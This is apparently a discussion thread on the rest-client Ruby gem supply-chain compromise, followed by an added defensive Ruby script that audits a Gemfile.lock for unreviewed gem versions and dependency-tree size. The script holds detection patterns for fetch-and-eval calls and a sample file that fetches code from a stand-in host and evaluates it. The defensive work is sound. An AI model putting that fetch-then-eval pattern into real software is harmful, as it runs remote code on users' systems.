PSA: Supply chain attack on rest-client, an extremely widely deployed Ruby library. https://github.com/rest-client/rest-client/issues/713
Having your application evaluate code grabbed from Pastebin at runtime [0] will *also* pose some cultural challenges, though.
[0] The attack payload here.
There’s serious tension between grabbing the latest compromised gem & leaving libxml RCE unpatched. The unspeakable answer is to use shorter dependency trees.
i’m really excited that rust’s default build tool has vendoring built in now for this reason. vendoring deps locally is one way to force them through code review
Delays the exploit window by a random time, doesn’t eliminate it though. Encourage ecosystems towards signed releases & MFA & multisig on package repositories and allow consumer side to filter/fund?
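The replies above make three practical points: the payload was code fetched and evaluated at runtime, a shorter dependency tree is less to audit, and vendoring dependencies forces them through code review. The Ruby script below is an added example (not from the thread, Twitter, or the rest-client project) that turns those points into a pre-install check: it parses a Gemfile.lock, counts what each top-level gem drags in transitively, flags any gem that is new or has changed version since a human last reviewed it, and prioritises vendored source files that both fetch remote content and evaluate a string. The reviewed-manifest format is this script's own convention, not a Bundler feature, and the lockfile, manifest and source snippet are constructed samples.

```ruby
# Added example, not code from the thread or from rest-client. Audits a
# Gemfile.lock against a locally kept, code-reviewed manifest of gem versions
# and measures how many gems each top-level dependency pulls in. The manifest
# format is this script's own convention, not a Bundler feature. All inputs
# below are constructed samples.

# Parse the "specs:" section of a Gemfile.lock.
# Returns { name => { version: "x.y.z", deps: ["name", ...] } }.
def parse_lockfile_specs(lock_text)
  specs = {}
  current = nil
  in_specs = false
  lock_text.each_line do |raw|
    line = raw.chomp
    if line =~ /\A\S/               # new top-level section (GEM, PLATFORMS, ...)
      in_specs = false
      next
    end
    if line == "  specs:"
      in_specs = true
      next
    end
    next unless in_specs
    case line
    when /\A    (\S+) \(([^)]+)\)\z/   # 4-space indent: a resolved gem
      current = Regexp.last_match(1)
      specs[current] = { version: Regexp.last_match(2), deps: [] }
    when /\A      (\S+)/               # 6-space indent: a dependency of `current`
      specs[current][:deps] << Regexp.last_match(1) if current
    end
  end
  specs
end

# Every gem that `root` pulls in, directly or transitively (root excluded).
def transitive_deps(specs, root)
  seen = {}
  stack = [root]
  until stack.empty?
    name = stack.pop
    next if seen[name]
    seen[name] = true
    (specs[name] ? specs[name][:deps] : []).each { |d| stack.push(d) }
  end
  seen.keys - [root]
end

# Gems whose resolved version differs from the reviewed manifest
# ({ name => version }); a missing manifest entry means never reviewed.
def unreviewed_gems(specs, reviewed)
  specs.each_with_object({}) do |(name, info), out|
    next if reviewed[name] == info[:version]
    out[name] = { resolved: info[:version], reviewed: reviewed[name] }
  end
end

# Review aid for vendored sources: a file that both fetches remote content and
# evaluates a string is worth a human look first. Heuristic only; it ranks
# files for review and is not a detector of compromised gems.
FETCH_CALLS = /\bNet::HTTP\b|\bopen-uri\b|\bURI\.open\b|\bopen\(\s*["']https?:/
EVAL_CALLS  = /\b(?:eval|instance_eval|class_eval|module_eval)\s*\(/

def fetches_and_evals?(source)
  !!(source =~ FETCH_CALLS && source =~ EVAL_CALLS)
end

# ---- constructed sample inputs (not real project data) -------------------
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      domain_name (0.5.0)
        unf (>= 0.0.5, < 1.0.0)
      http-cookie (1.0.3)
        domain_name (~> 0.5)
      mime-types (3.2.2)
        mime-types-data (~> 3.2015)
      mime-types-data (3.2019.0331)
      netrc (0.11.0)
      rest-client (2.1.0)
        http-cookie (>= 1.0.2, < 2.0)
        mime-types (>= 1.16, < 4.0)
        netrc (~> 0.8)
      unf (0.1.4)
        unf_ext
      unf_ext (0.0.7.6)

  PLATFORMS
    ruby

  DEPENDENCIES
    rest-client
LOCK

# Versions a reviewer signed off on last time (constructed): rest-client has
# since moved and netrc was never reviewed.
REVIEWED_MANIFEST = {
  "domain_name" => "0.5.0", "http-cookie" => "1.0.3", "mime-types" => "3.2.2",
  "mime-types-data" => "3.2019.0331", "rest-client" => "2.0.2",
  "unf" => "0.1.4", "unf_ext" => "0.0.7.6"
}.freeze

# Constructed vendored file showing the fetch-then-eval shape the thread describes.
SAMPLE_VENDORED_FILE = <<~'RUBY'
  require "open-uri"
  code = URI.open("https://example.invalid/snippet").read
  eval(code)
RUBY

if $PROGRAM_NAME == __FILE__
  specs = parse_lockfile_specs(SAMPLE_LOCK)
  puts "rest-client pulls in #{transitive_deps(specs, 'rest-client').size} gems"
  unreviewed_gems(specs, REVIEWED_MANIFEST).each do |name, v|
    puts "UNREVIEWED #{name}: resolved #{v[:resolved]}, reviewed #{v[:reviewed].inspect}"
  end
  puts "vendored file needs review first" if fetches_and_evals?(SAMPLE_VENDORED_FILE)
end
```

Run it as a CI step before `bundle install`: a non-empty `unreviewed_gems` result is the signal that the lockfile moved without a review, which is exactly the window a malicious release relies on. The transitive count is the number the "shorter dependency trees" reply is about; watching it grow over time is cheap and surprisingly informative.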